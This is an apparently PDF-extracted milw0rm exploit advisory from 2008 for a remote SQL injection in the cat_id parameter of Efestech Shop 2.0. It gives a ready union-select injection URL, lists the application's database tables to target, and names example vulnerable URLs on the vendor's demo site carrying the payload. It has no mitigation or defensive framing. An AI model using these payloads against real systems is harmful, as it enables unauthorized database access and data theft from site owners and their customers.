Efestech Shop 2.0 cat_id Remote SQL Injection Vulnerability.pdf

1 Title: Efestech Shop v2.0 Sql Ä°njection Vuln 2 3 ============================== 4 ================================== 5 6 [+] Author : Dr.Kacak 7 [+] Special Thankz : KnockOut And All My Friends 8 [+] System 0VerfL0WerZ Group & BuqX Team 9 [+] Mail : BuqX [at] Hotmail [dot] com 10 11 ================================================================= 12 13 Script : Efestech Shop v2.0 14 Verz: 2.0 15 Download : http://www.aspindir.com/indir/5479 16 17 18 19 SQL attack ; 20 21 http://target.com/path/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar 22 23 Tables; 24 25 ayarlar 26 cat_eng 27 cat_tr 28 eng 29 lisans 30 mark_eng 31 mark_tr 32 product 33 subcat_eng 34 subcat_tr 35 tr 36 urun_resim 37 38 39 40 ############################################################### 41 42 Example Bug Site : 43 44 http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar 45 http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+eng 46 http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+tr 47 48 # milw0rm.com [2008−07−01] Page 1/1 Efestech Shop 2.0 cat_id Remote SQL Injection Vulnerability Kacak 07/01/2008